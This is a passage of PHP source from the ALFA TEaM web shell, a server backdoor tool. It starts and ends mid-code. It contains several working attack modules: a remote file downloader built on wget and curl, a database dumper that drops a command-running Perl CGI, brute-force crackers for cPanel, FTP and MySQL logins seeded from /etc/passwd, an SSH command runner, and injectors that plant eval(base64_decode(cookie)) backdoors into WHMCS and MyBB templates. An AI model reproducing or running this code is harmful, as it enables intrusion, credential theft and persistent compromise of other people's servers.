- } function alfawhois(){ echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');
- return false;
- \"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;
- ' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
- if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){ $site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
- $target = 'https://dnsquery.org/whois,request/'.$site;
- $data = @file_get_contents($target);
- if($data==''){ $get = new AlfaCURL();
- $get->ssl = true;
- $data = $get->Send($target);
- } echo __pre();
- if(preg_match('/\<pre\>(.*)\<\/pre\>/s',$data,$match)){ echo($match[0]);
- } } echo("</div>");
- } function alfaremotedl(){ alfahead();
- echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
- <form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');
- return false;
- \">
- <p><div class='txtfont'>Url: </div>
-
-
- <input type='text' name='d' size='50'></p>
- <div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
- </form></p></center>");
- if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){ echo __pre();
- $url = $_POST['alfa1'];
- $path = $_POST['alfa2'];
- echo('<center>');
- if(__download($url,$path)){ echo('<font color="green">Success...!</font>');
- }else{ echo('<font color="red">Error...!</font>');
- } echo('</center>');
- } echo("</div>");
- alfafooter();
- } function __download($url,$path=false){ if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
- $saveas = basename(urldecode($url));
- if($path){$saveas=$path.$saveas;
- } if($content = __read_file($url)){ if(@is_file($saveas))unlink($saveas);
- if(__write_file($saveas, $content)){return true;
- }} $buff = alfaEx("wget ".$url." -O ".$saveas);
- if(@is_file($saveas)) return true;
- $buff = alfaEx("curl ".$url." -o ".$saveas);
- if(@is_file($saveas)) return true;
- $buff = alfaEx("lwp-download ".$url." ".$saveas);
- if(@is_file($saveas)) return true;
- $buff = alfaEx("lynx -source ".$url." > ".$saveas);
- if(@is_file($saveas)) return true;
- $buff = alfaEx("GET ".$url." > ".$saveas);
- if(@is_file($saveas)) return true;
- $buff = alfaEx("links -source ".$url." > ".$saveas);
- if(@is_file($saveas)) return true;
- $buff = alfaEx("fetch -o ".$saveas." -p ".$url);
- if(@is_file($saveas)) return true;
- return false;
- } function __read_file($file){ $content = false;
- if($fh = @fopen($file, "rb")){ $content = "";
- while(!feof($fh)){ $content .= fread($fh, 8192);
- } } return $content;
- } function alfaSettings(){ alfahead();
- AlfaNum(6,7,8,9,10);
- echo '<div class=header><p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="g(\'settings\',null,this.protect.value,this.lgpage.value,this.username.value,this.password.value,\'>>\',this.icon.value);
- if(this.e.value==0&&this.protect.value==1)setTimeout(\'location.reload()\',1000);
- if(this.s.value!=this.icon.value)setTimeout(\'location.reload()\',1000);
- return false;
- " method=\'post\'>
- <div class="txtfont">Protect: </div> <select style="width: 5%;
- " name="protect">';
- $lg_array = array('0'=>'No','1'=>'Yes');
- foreach($lg_array as $key=>$val)echo '<option value="'.$key.'" '.($GLOBALS['Alfa_Protect_Shell']=='1'?'selected':'').'>'.$val.'</option>';
- echo("</select>
- ");
- echo '<div class="txtfont">Show Icons: </div> <select style="width: 5%;
- " name="icon">';
- $lg_array = array('0'=>'No','1'=>'Yes');
- foreach($lg_array as $key=>$val)echo '<option value="'.$key.'" '.($GLOBALS['Alfa_Show_Icons']=='1'?'selected':'').'>'.$val.'</option>';
- echo("</select>
- ");
- echo '<div class="txtfont">login Page: </div> <select style="width: 12%;
- " name="lgpage">';
- $lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
- foreach($lg_array as $key=>$val)echo '<option value="'.$key.'" '.($GLOBALS['Alfa_Login_Page']==$key?'selected':'').'>'.$val.'</option>';
- echo("</select>
- ");
- echo '<div class="txtfont">UserName: </div> <input type="hidden" name="e" value="'.$GLOBALS['Alfa_Protect_Shell'].'"><input type="hidden" name="s" value="'.$GLOBALS['Alfa_Show_Icons'].'"><input size="10" type="text" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['Alfa_User']:$_POST['alfa3']).'" placeholder="solevisible"> <div class="txtfont">Password: </div> <input size="10" type="text" name="password" placeholder="*****"> <input type="submit" name="btn" value=" "></form></center><br>';
- if($_POST['alfa5']=='>>'){ if(!empty($_POST['alfa3'])){ $protect = $_POST['alfa1'];
- $lgpage = $_POST['alfa2'];
- $username = $_POST['alfa3'];
- $password = md5($_POST['alfa4']);
- $icon = $_POST['alfa6'];
- @chdir($GLOBALS['home_cwd']);
- $basename = @basename($_SERVER['PHP_SELF']);
- $data = @file_get_contents($basename);
- $find_user = '/\$GLOBALS\[\'Alfa_User\'\](.*?);
- /i';
- $find_pw = '/\$GLOBALS\[\'Alfa_Pass\'\](.*?);
- /i';
- $find_lg = '/\$GLOBALS\[\'Alfa_Login_Page\'\](.*?);
- /i';
- $find_p = '/\$GLOBALS\[\'Alfa_Protect_Shell\'\](.*?);
- /i';
- $icons = '/\$GLOBALS\[\'Alfa_Show_Icons\'\](.*?);
- /i';
- if(!empty($username)&&preg_match($find_user,$data,$e)){ $new = '$GLOBALS[\'Alfa_User\'] = \''.$username.'\';
- ';
- $data = str_replace($e[0],$new,$data);
- } if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){ $new = '$GLOBALS[\'Alfa_Pass\'] = \''.$password.'\';
- ';
- $data = str_replace($e[0],$new,$data);
- } if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){ $new = '$GLOBALS[\'Alfa_Login_Page\'] = \''.$lgpage.'\';
- ';
- $data = str_replace($e[0],$new,$data);
- } if(!empty($find_p)&&preg_match($find_p,$data,$e)){ $new = '$GLOBALS[\'Alfa_Protect_Shell\'] = \''.$protect.'\';
- ';
- $data = str_replace($e[0],$new,$data);
- } if(preg_match($icons,$data,$e)){ $new = '$GLOBALS[\'Alfa_Show_Icons\'] = \''.$icon.'\';
- ';
- $data = str_replace($e[0],$new,$data);
- } @file_put_contents($basename,$data);
- echo __pre();
- echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font>';
- }else{ __alert("UserName is Empty !");
- } } echo('</div>');
- alfafooter();
- } function alfaplus(){ alfahead();
- echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');
- ">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
- if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){ try{ $s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
- $msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
- $news = new AlfaCURL();
- if($news->Send($s1)){ $xml = $news->Send($s1);
- }else{ $xml = false;
- } if($xml){ if(@simplexml_load_string($xml)){ $doc = new DOMDocument;
- $doc->loadXML($xml);
- $data = $doc->getElementsByTagName('data')->item(0);
- $items = $data->getElementsByTagName('item');
- foreach($items as $item){ $title = $item->getElementsByTagName('title')->item(0)->nodeValue;
- $description = $item->getElementsByTagName('description')->item(0)->nodeValue;
- $link = $item->getElementsByTagName('link')->item(0)->nodeValue;
- $pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;
- echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font color='#ff4d4d'>Date: $pubDate</font></small></center></pre>");
- } }else{ echo($msg);
- } }else{ echo($msg);
- } }catch(Exception $e){ echo $e->getMessage();
- }}elseif($_POST['alfa1']=='about'){ echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
- <font size='+2' color='#00A220'>☮
- ~ PEACE ~ ☮
- </font><br>
- <font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
- <font color='#00A220'>Contact : solevisible@gmail.com</font><br>
- <font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
- <font color='#FFFFFF'>Skype : sole.sad</font><br>
- <font color='#FF0000'>Persian Gulf For Ever</font><br>
- <font color='#FF0000'>Iranian Hackers :)</font><br>
- <font color='#FF0000'>Special Thanks To: R3veC0der</font><br>
- </center></pre>";
- } echo('</div>');
- alfafooter();
- } function alfaDumper(){ alfahead();
- echo('<div class="header">');
- AlfaNum(8,9,10);
- echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value);
- return false;
- \"><p>";
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50') );
- create_table($table);
- echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
- $username = ($_POST['alfa3']);
- $password = ($_POST['alfa4']);
- $dbname = ($_POST['alfa5']);
- $dfile = ($_POST['alfa6']);
- $host = ($_POST['alfa7']);
- if(!empty($dbname)){ echo __pre();
- $msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
- if(@mysqli_connect($host,$username,$password,$dbname)){ $string = alfaEx("mysqldump");
- if(strlen($string)>0){ alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > $dfile");
- echo($msg);
- }else{ @mkdir('cgialfa',0755);
- @chdir('cgialfa');
- alfacgihtaccess('cgi');
- @file_put_contents("alfa_dumper.alfa",'#!/usr/bin/perl -I/usr/local/bandmain'."\n".'#solevisible@gmail.com'."\n".'use CGI;
- print "Content-type: text/html\n\n";
- print "<html>";
- print "<title>Alfa Team~ Mysql Dumper</title>";
- print "<body>";
- my $host = CGI::url_param(\'host\');
- my $username = CGI::url_param(\'username\');
- my $password= CGI::url_param(\'password\');
- my $dbname = CGI::url_param(\'dbname\');
- my $dfile = CGI::url_param(\'dfile\');
- system("mysqldump --single-transaction --host=\"".$host."\" --user=\"".$username."\" --password=\"".$password."\" ".$dbname." > ". $dfile);
- print "<font color=\'green\'>Check This => ".$dfile."</font></body></html>";
- ');
- @chmod("alfa_dumper.alfa", 0755);
- echo AlfaiFrameCreator("cgialfa/alfa_dumper.alfa?host=".urlencode($host)."&username=".urlencode($username)."&password=".urlencode($password)."&dbname=".urlencode($dbname)."&dfile=".urlencode($dfile)."");
- } }else{ echo('<center>mysqli_connect : Error!</center>');
- } } echo('</div>');
- alfafooter();
- } function Alfa_DirectAdmin_Cracker($info){ if(!$info['mysql']) $url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
- else $url = $info['protocol'].$info['target'].'/phpmyadmin';
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2;
- WOW64;
- rv:17.0) Gecko/20100101 Firefox/17.0');
- curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
- curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
- curl_setopt($curl, CURLOPT_HEADER,0);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_URL,$url);
- curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
- if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
- $result = curl_exec($curl);
- $curl_errno = curl_errno($curl);
- $curl_error = curl_error($curl);
- if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
- } elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
- $info['target'] = $url;
- CrackerResualt($info);
- } curl_close($curl);
- } function Alfa_CP_Cracker($info){ $url = $info['protocol'].$info['target'].':'.$info['port'];
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2;
- WOW64;
- rv:17.0) Gecko/20100101 Firefox/17.0');
- curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
- curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
- curl_setopt($curl, CURLOPT_HEADER,0);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
- curl_setopt($curl, CURLOPT_URL, $url);
- $result = curl_exec($curl);
- $curl_errno = curl_errno($curl);
- $curl_error = curl_error($curl);
- if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
- } elseif(preg_match('/filemanager/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
- $info['target'] = $url;
- CrackerResualt($info);
- } curl_close($curl);
- } function Alfa_FTP_Cracker($info){ $url = $info['protocol'].$info['target'];
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_URL, $url);
- curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2;
- WOW64;
- rv:17.0) Gecko/20100101 Firefox/17.0');
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
- $result = curl_exec($curl);
- $curl_errno = curl_errno($curl);
- $curl_error = curl_error($curl);
- if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
- } elseif(preg_match('/(\d+):(\d+)/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
- $info['target'] = $url;
- CrackerResualt($info);
- } curl_close($curl);
- } function Alfa_Mysql_Cracker($info){ if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){ CrackerResualt($info);
- echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
- } } function Alfa_FTPC($info){ if($con=@ftp_connect($info['target'],$info['port'])){ if($con){ $login=@ftp_login($con,$info['username'],$info['password']);
- if($login){CrackerResualt($info);
- }}} @ftp_close($con);
- } function CrackerResualt($info){ $res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
- $c = @fopen($info['fcrack'],'a+');
- @fwrite($c, $res);
- @fclose($c);
- } function Alfa_Call_Function_Cracker($method,$info){ switch($method){case 'cp':return Alfa_CP_Cracker($info);
- break;
- case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);
- break;
- case 'ftp':return Alfa_FTP_Cracker($info);
- break;
- case 'mysql':return Alfa_Mysql_Cracker($info);
- break;
- case 'mysql':return Alfa_FTPC($info);
- break;
- } } function alfaCrackers(){ alfahead();
- AlfaNum(9,10);
- echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);
- return false;
- "><div class="txtfont">Login Page: <select onclick="dis_input(this.value);
- " name="loginpanel">';
- foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
- echo '</select> Protocol: <select id="protocol" name="protocol">';
- foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
- echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
- Port: <input id="port" type="text" name="port" value="2083">
- <table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
- <textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
-   <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
- Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
- <p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
- $target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
- $port = $_POST['alfa2'];
- $usernames= $_POST['alfa3'];
- $passwords = $_POST['alfa4'];
- $fcrack = $_POST['alfa5'];
- $cracking = $_POST['alfa6'];
- $protocol = $_POST['alfa7'];
- $loginpanel = $_POST['alfa8'];
- $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
- if($cracking=='start'){ echo __pre();
- $exuser = explode("\n",$usernames);
- $expw = explode("\n",$passwords);
- foreach($exuser as $user){ foreach($expw as $pw){ $array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
- Alfa_Call_Function_Cracker($loginpanel,$array);
- } } echo '<br><font color="red">Attack Finished...</font>';
- } echo '</div>';
- alfafooter();
- } function alfassh2(){ if(function_exists('ssh2_connect')){ $_SESSION['connected']= false;
- $ssh_ip = $_POST['alfa1'];
- $ssh_login = $_POST['alfa2'];
- $ssh_pass = $_POST['alfa3'];
- $ssh_port = $_POST['alfa4'];
- $ssh_command = $_POST['alfa5'];
- if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port)) { if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass)) { $_SESSION['connected']= true;
- } } if($_SESSION['connected']!== true){ alfahead();
- echo "<div class=header>";
- echo "
- <form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value);
- return false;
- '>
- <table cellpadding='2' cellspacing='0'><tr>
- <td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr>
- <td><input type=text name=ssh_ip value=''></td>
- <td><input type=text name=ssh_login value=''></td>
- <td><input type=text name=ssh_pass value=''></td>
- <td><input type=text name=ssh_port value=''></td>
- <td><input type='submit' name='submit' value=' '></td>
- </table></form>";
- echo "</div>";
- alfafooter();
- } if($_SESSION['connected']==true){ alfahead();
- echo "<div class=header>";
- echo "
- <form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"".$ssh_ip."\",\"".$ssh_login."\",\"".$ssh_pass."\",\"".$ssh_port."\",this.ssh_command.value,\">>\");
- return false;
- '>
- <table cellpadding='2' cellspacing='0'><tr>
- <td><input type=text name=ssh_command value=''></td>
- <td><input type='submit' name='execute' value=' '></td></table></form>
- <form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\');
- return false;
- '>
- <input type=submit name='destsession' value='logout'>
- </form>";
- $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
- stream_set_blocking($alfastream,true);
- $output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);
- if($_POST['alfa6']=='>>'){ echo '<pre class=ml1>';
- ob_start();
- echo stream_get_contents($output);
- echo htmlspecialchars(ob_get_clean());
- } echo "</div>";
- alfafooter();
- }}else{ alfahead();
- echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
- alfafooter();
- } } function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";
- } function alfaShellInjectors(){ alfahead();
- echo '<div class=header>';
- AlfaNum(11);
- echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
- $selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;
- "><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
- if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){ AlfaNum();
- echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value);
- return false;
- \" method='post'>";
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50') );
- create_table($table);
- echo $selector;
- echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
- if(isset($_POST['alfa6'])) { $dbu = $_POST['alfa6'];
- $dbn = $_POST['alfa7'];
- $dbp = $_POST['alfa8'];
- $dbh = $_POST['alfa9'];
- $path = $_POST['alfa10'];
- $method = $_POST['alfa4'];
- $index = "{php}".ALFA_UPLOADER.";
- {/php}";
- $newin = str_replace("'","\'",$index);
- $newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"]));
- die(\"!\");
- }{\/php}";
- if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){ if(filter_var($path,FILTER_VALIDATE_URL)){ $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
- $soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
- $soleGet = mysqli_fetch_assoc($soleSave);
- $tempSave1 = $soleGet['message'];
- $tempSave = str_replace("'","\'",$tempSave1);
- $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
- $result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
- $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
- $result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
- if(function_exists('curl_version') && $method == 'auto'){ $AlfaSole = new AlfaCURL(true);
- $saveurl = $AlfaSole->Send($path."/pwreset.php");
- $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
- $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
- $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
- $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
- __alert("shell injectet...");
- $ff= 'http://'.$path."/solevisible.php";
- output($ff);
- }else{ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";
- }}else{__alert('Path is not Valid...');
- }}} }if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){ AlfaNum(1,2,3,5);
- echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value);
- return false;
- \" method=POST>
- ";
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50') );
- create_table($table);
- echo $selector;
- echo "<p><input type=submit value=' '></p></form></center></center>";
- if(isset($_POST['alfa6'])) { $dbu = $_POST['alfa6'];
- $dbn = $_POST['alfa7'];
- $dbp = $_POST['alfa8'];
- $dbh = $_POST['alfa9'];
- $prefix = $_POST['alfa10'];
- $method = $_POST['alfa4'];
- $shellCode = "{\${".ALFA_UPLOADER."}}";
- $newinshell = str_replace("'","\'",$shellCode);
- if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){ $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
- $inject = "select template from {$prefix}templates where title= 'calendar'";
- $result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
- $GetTemp = mysqli_fetch_assoc($result);
- $saveDate = $GetTemp['template'];
- $repsave = str_replace($shellCode,"",$saveDate);
- $repsave = str_replace("'","\'",$repsave);
- $createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
- $result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
- $geturl = "select value from {$prefix}settings where name= 'bburl'";
- $findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
- $rowb = mysqli_fetch_assoc($findurl);
- $furl = $rowb['value'];
- $realurl = parse_url($furl,PHP_URL_HOST);
- $realpath = parse_url($furl,PHP_URL_PATH);
- $res = false;
- $AlfaCurl = new AlfaCURL();
- if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){ if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){ @fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
- @fputs($fsock, "HOST: $realurl\r\n");
- @fputs($fsock, "Connection: close\r\n\r\n");
- $check = fgets($fsock);
- if(preg_match("/200 OK/i",$check)){ $repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
- $clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));
- $res = true;
- } @fclose($fsock);
- }}elseif(function_exists('curl_version') && $method == 'auto'){ $AlfaCurl->Send($realurl.$realpath."/calendar.php");
- $res = true;
- } if($res){ $ff = 'http://'.$realurl.$realpath."/solevisible.php";
- output($ff);
- }else{ $ff = 'http://'.$realurl.$realpath."/calendar.php";
- $fff = 'http://'.$realurl.$realpath."/solevisible.php";
- echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
- }}}} if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){ AlfaNum(1,2,7,9,10);
